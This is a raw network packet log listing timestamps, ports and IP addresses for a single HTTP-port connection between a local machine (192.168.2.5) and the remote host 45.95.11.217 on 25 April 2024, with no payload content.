Apr 25, 2024 22:47:46.036120892 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:46.036151886 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.036165953 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.036190033 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.036192894 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:46.036207914 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:46.036262989 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.036284924 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:46.036295891 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.036298990 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:46.036339998 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:46.036341906 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.036356926 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.036386013 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.036386013 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:46.036401033 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:46.036411047 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.036417007 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:46.036448956 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:46.036652088 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.036716938 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:46.036730051 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.036745071 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.036757946 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.036772966 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:46.036784887 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:46.036802053 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:46.036830902 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.036885023 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:46.036921978 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.036936045 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.036964893 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:46.036988020 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:46.036995888 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.037010908 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.037019014 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.037033081 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.037046909 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:46.037086010 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:46.037097931 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:46.037101984 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.037144899 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:46.037178040 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.037216902 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:46.037230968 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.037256956 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.037267923 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:46.037291050 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:46.037516117 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.037529945 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.037559986 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:46.037575006 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.037591934 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:46.037604094 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.037616014 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:46.037645102 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:46.037728071 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.037760973 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.037770033 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:46.037775993 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.037792921 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:46.037805080 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.037817001 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:46.037842989 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.037852049 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:46.037870884 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.037880898 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:46.037930965 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:46.037993908 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.038029909 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:46.038062096 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.038093090 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:46.038111925 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.038146973 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:46.038201094 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.038245916 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:46.038276911 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.038315058 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.038315058 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:46.038347960 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:46.038381100 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.038415909 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:46.038419962 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.038459063 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:46.038460970 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.038501024 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:46.038532019 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.038564920 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:46.038866997 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.038882017 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.038902044 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:46.038918972 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:46.038969994 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.039007902 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:46.039040089 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.039072990 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.039074898 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:46.039105892 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:46.039117098 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.039155960 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:46.039155960 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.039186001 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.039191961 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:46.039217949 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.039225101 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:46.039253950 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:46.266163111 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.266232014 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:46.266278028 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.266304016 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.266383886 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:46.266411066 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.266457081 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.266463995 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:46.266540051 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.266577005 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:46.266577959 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.266632080 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.266663074 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.266671896 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:46.266721010 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.266756058 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:46.266771078 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.266859055 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.266892910 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:46.266900063 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.266937971 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.266977072 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:46.267002106 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.267030954 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.267061949 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:46.267144918 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.267158031 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.267191887 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:46.267219067 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.267476082 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.267509937 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:46.267512083 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.267554998 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.267586946 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:46.267604113 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.267802954 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.267838001 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:46.267882109 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.268073082 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.268110991 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:46.268119097 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.268145084 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.268177986 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:46.268207073 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.268220901 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.268254995 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:46.268269062 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.268326044 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.268367052 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:46.268371105 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.268410921 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.268444061 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:46.268502951 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.268553019 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.268589020 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:46.268718958 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.268882990 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.268918037 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:46.268932104 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.268985033 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.268996000 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.269016981 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:46.269054890 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.269093037 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:46.269113064 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.269160032 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.269191980 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:46.269211054 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.269227982 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.269258976 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:46.269279957 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.269505978 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.269542933 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:46.269568920 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.269620895 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.269656897 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:46.269886017 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.270015955 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.270054102 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:46.270153999 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.270229101 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.270260096 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.270266056 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:46.270306110 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.270339012 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:46.270365953 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.270418882 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.270454884 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:46.270498037 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.270699024 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.270735979 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:46.270756960 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.270972967 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.270987988 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.271014929 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:46.279751062 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:46.499201059 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.499356985 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.499367952 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.499452114 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:46.499536991 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.499550104 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.499561071 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.499583960 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:46.499603987 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:46.499665022 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.499675989 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.499686956 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.499707937 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:46.499800920 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.499813080 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.499835014 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:46.499990940 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.500003099 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.500015020 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.500030041 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.500031948 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:46.500047922 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:46.500155926 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.500166893 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.500181913 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.500189066 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:46.500221968 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:46.500353098 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.500364065 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.500375032 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.500386000 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.500400066 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:46.500439882 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:46.500488043 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.500612974 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.500648975 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:46.500742912 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.501089096 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.501126051 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:46.501271009 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.501281977 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.501293898 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.501327991 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:46.501409054 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.501420975 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.501435041 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.501441956 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:46.501473904 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:46.501521111 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.502099037 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.502110958 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.502123117 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.502140999 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:46.502161026 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:46.502279997 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.502291918 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.502302885 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.502350092 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:46.502429962 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.502439976 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.502450943 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.502460957 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:46.502496004 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:46.502793074 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.502804995 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.502859116 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:46.502942085 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.502953053 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.502993107 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:46.503012896 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.503429890 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.503442049 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.503453970 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.503475904 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:46.503504992 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:46.503551960 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.503563881 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.503595114 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:46.504672050 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.504686117 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.504735947 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:46.504800081 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.504812002 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.504822969 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.504834890 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.504848957 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.504857063 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:46.504862070 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.504883051 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.504884958 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:46.504966021 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:46.505635023 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.505681992 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:46.506618023 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.506763935 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.506812096 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:46.509532928 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.509550095 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.509624004 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:46.728513956 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.728535891 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.728570938 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.728585005 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.728617907 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:46.728682995 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:46.728697062 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.728710890 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.728755951 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:46.729160070 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.729176044 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.729191065 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.729206085 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.729217052 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:46.729234934 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:46.729942083 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.729959965 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.729974985 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.730017900 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:46.730030060 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.730045080 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.730067968 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:46.730093002 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.730107069 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.730124950 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:46.730214119 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.730228901 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.730251074 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:46.730323076 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.730338097 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.730355978 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:46.730411053 CEST	80	49706	45.95.11.217	192.168.2.5
